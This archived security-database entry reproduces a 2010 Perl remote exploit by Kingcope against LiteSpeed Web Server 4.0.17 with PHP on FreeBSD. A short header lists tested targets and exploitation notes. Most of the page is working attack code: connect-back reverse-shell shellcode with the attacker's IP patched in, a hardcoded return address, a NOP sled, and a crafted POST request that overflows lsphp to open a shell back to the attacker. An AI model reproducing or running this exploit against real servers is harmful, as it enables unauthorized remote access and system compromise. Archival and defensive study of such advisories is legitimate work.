Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:25307
HistoryDec 14, 2010 - 12:00 a.m.

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD

2010-12-1400:00:00
vulners.com
102
litespeed web server
php remote exploit
freebsd
kingcope
dec 2010
8.0-release
6.3-release
admin interface
standard & enterprise x86

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for

FreeBSD

bug discovered & exploited by Kingcope

Dec 2010

Lame Xploit Tested with success on

FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17

Standard & Enterprise x86

FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17

Standard & Enterprise x86

FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15

Standard x86

can be used against the admin interface (port 7080),

too

Xploit only works on default lsphp binary not the

compiled version

this should be exploitable on linux too (on the

compiled SAPI version)

the shipped linux version of lsphp has stack cookies

enabled,

which could be brute forced if there wasn't a null put

at the end of

the exploit buffer. The compiled SAPI version is

exploitable, but then

the offsets differ from box to box, so this time

FreeBSD targets only.

thus on linux this is very tricky to exploit.

this is a proof of concept, don't try this on real

boxes

see lsapilib.c line 1240

(http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz)

use IO::Socket;

$|=1;

#freebsd reverse shell port 443
#setup a netcat on this port ^^
$bsdcbsc =
# setreuid, no root here

"\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".
# connect back :>
"\x31\xc0\x31\xdb\x53\xb3\x06\x53".
"\xb3\x01\x53\xb3\x02\x53\x54\xb0".
"\x61\xcd\x80\x31\xd2\x52\x52\x68".
"\x41\x41\x41\x41\x66\x68\x01\xbb".
"\xb7\x02\x66\x53\x89\xe1\xb2\x10".
"\x52\x51\x50\x52\x89\xc2\x31\xc0".
"\xb0\x62\xcd\x80\x31\xdb\x39\xc3".
"\x74\x06\x31\xc0\xb0\x01\xcd\x80".
"\x31\xc0\x50\x52\x50\xb0\x5a\xcd".
"\x80\x31\xc0\x31\xdb\x43\x53\x52".
"\x50\xb0\x5a\xcd\x80\x31\xc0\x43".
"\x53\x52\x50\xb0\x5a\xcd\x80\x31".
"\xc0\x50\x68\x2f\x2f\x73\x68\x68".
"\x2f\x62\x69\x6e\x89\xe3\x50\x54".
"\x53\x50\xb0\x3b\xcd\x80\x31\xc0".
"\xb0\x01\xcd\x80";

sub usage() {
print "written by kingcope\n";
print "usage:\n".
"litespeed-remote.pl <target ip/host>
<target port>
<your ip> <php file on remote host>\n\n".
"example:\n".
"perl litespeed-remote.pl 192.168.2.3
8088
192.168.2.2 phpinfo.php\n\n";

    exit;

}

if ($#ARGV ne 3) { usage; }

$target = $ARGV[0];
$port = $ARGV[1];
$cbip = $ARGV[2];
$file = $ARGV[3];

($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));

substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);

#my $sock = IO::Socket::INET->new(PeerAddr => $target,

PeerPort => 8088,

Proto =>

'tcp');
#$a = "A" x 500;
#print $sock "POST /phpinfo.php HTTP/1.1\r\nHost:
192.168.2.5\r\n\r\n";

#$x = <stdin>;

#$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE
#$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE
$ret = pack("V", 0x080F40CD); # JMP EDX lsphp

my $sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => $port,
Proto =>
'tcp');

$a = "A" x 263 . "AAAA" x 6 . $ret . "C" x 500;
$sc = "\x90" x 3000 . $bsdcbsc;

print $sock "POST
/\x90\x90\x90\x90\x90\x90\xeb\x50/…/$file?
HTTP/1.1\r\nHost: $target\r\nVVVV: $sc\r\n$a
KINGCOPEH4XXU:\r\n\r\n";

while (<$sock>) {
print;
}